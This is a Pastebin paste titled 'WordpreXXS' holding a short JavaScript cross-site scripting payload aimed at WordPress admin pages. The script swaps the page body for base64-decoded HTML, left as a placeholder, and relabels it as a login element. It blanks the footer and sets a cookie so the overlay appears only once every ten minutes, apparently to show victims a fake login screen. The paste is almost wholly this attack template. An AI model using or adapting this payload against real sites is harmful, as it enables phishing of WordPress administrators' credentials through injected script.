Advertisement
gszathmari

WordpreXXS

Oct 23rd, 2015
4,953
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. if (document.cookie.indexOf('visited') >= 0) {} else {
  2.  document.getElementById('wpwrap').innerHTML = atob('<<HTML GOES HERE>>');
  3.  document.getElementById('wpwrap').id = 'login';
  4.  document.getElementById('footer').innerHTML = '';
  5.  document.cookie = 'visited=true;path=/;max-age=' + 60 * 10;
  6. };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement